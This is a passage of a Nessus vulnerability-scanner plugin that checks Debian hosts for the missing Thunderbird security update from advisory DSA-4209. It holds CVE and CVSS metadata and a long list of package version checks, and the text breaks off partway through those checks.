package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4209. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110101);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-5150\", \"CVE-2018-5154\", \"CVE-2018-5155\", \"CVE-2018-5159\", \"CVE-2018-5161\", \"CVE-2018-5162\", \"CVE-2018-5168\", \"CVE-2018-5170\", \"CVE-2018-5178\", \"CVE-2018-5183\", \"CVE-2018-5184\", \"CVE-2018-5185\");\n script_xref(name:\"DSA\", value:\"4209\");\n\n script_name(english:\"Debian DSA-4209-1 : thunderbird - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple security issues have been found in Thunderbird, which may\nlead to the execution of arbitrary code, denial of service or attacks\non encrypted emails.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/thunderbird\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/thunderbird\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/thunderbird\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4209\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the thunderbird packages.\n\nFor the oldstable distribution (jessie), these problems have been\nfixed in version 1:52.8.0-1~deb8u1.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1:52.8.0-1~deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:thunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"calendar-google-provider\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-dbg\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-dev\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-all\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ast\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-be\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-bg\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-bn-bd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ca\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-cs\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-da\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-de\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-dsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-el\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-en-gb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-es-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-es-es\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-et\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-eu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-fi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-fr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-fy-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ga-ie\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-gd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-gl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-he\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-hr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-hsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-hu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-hy-am\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-id\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-is\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-it\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ja\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-kab\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ko\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-lt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-nb-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-nn-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-pa-in\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-pl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-pt-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-pt-pt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-rm\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ro\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ru\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-si\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-sk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-sl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-sq\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-sr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-sv-se\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-ta-lk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-tr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-uk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-vi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-zh-cn\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"icedove-l10n-zh-tw\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-extension\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ast\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-be\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-bg\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-bn-bd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ca\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-cs\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-cy\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-da\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-de\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-dsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-el\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-en-gb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-es-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-es-es\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-et\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-eu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-fi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-fr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-fy-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ga-ie\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-gd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-gl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-he\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-hr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-hsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-hu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-hy-am\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-id\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-is\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-it\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ja\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-kab\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ko\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-lt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-nb-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-nn-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-pa-in\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-pl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-pt-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-pt-pt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-rm\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ro\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ru\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-si\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-sk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-sl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-sq\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-sr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-sv-se\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-ta-lk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-tr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-uk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-vi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-zh-cn\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"iceowl-l10n-zh-tw\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ast\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-be\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-bg\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-bn-bd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ca\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-cs\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-cy\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-da\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-de\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-dsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-el\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-en-gb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-es-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-es-es\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-et\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-eu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-fi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-fr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-fy-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ga-ie\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-gd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-gl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-he\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-hr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-hsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-hu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-hy-am\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-id\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-is\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-it\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ja\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-kab\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ko\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-lt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-nb-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-nn-no\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-pa-in\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-pl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-pt-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-pt-pt\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-rm\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ro\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ru\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-si\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-sk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-sl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-sq\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-sr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-sv-se\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-ta-lk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-tr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-uk\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-vi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-zh-cn\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"lightning-l10n-zh-tw\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-dbg\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-dev\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-all\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ast\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-be\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-bg\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-bn-bd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-br\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ca\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-cs\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-da\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-de\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-dsb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-el\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-en-gb\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-es-ar\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-es-es\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-et\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-eu\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-fi\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-fr\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-fy-nl\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-ga-ie\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"thunderbird-l10n-gd\", reference:\"1:52.8.0-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 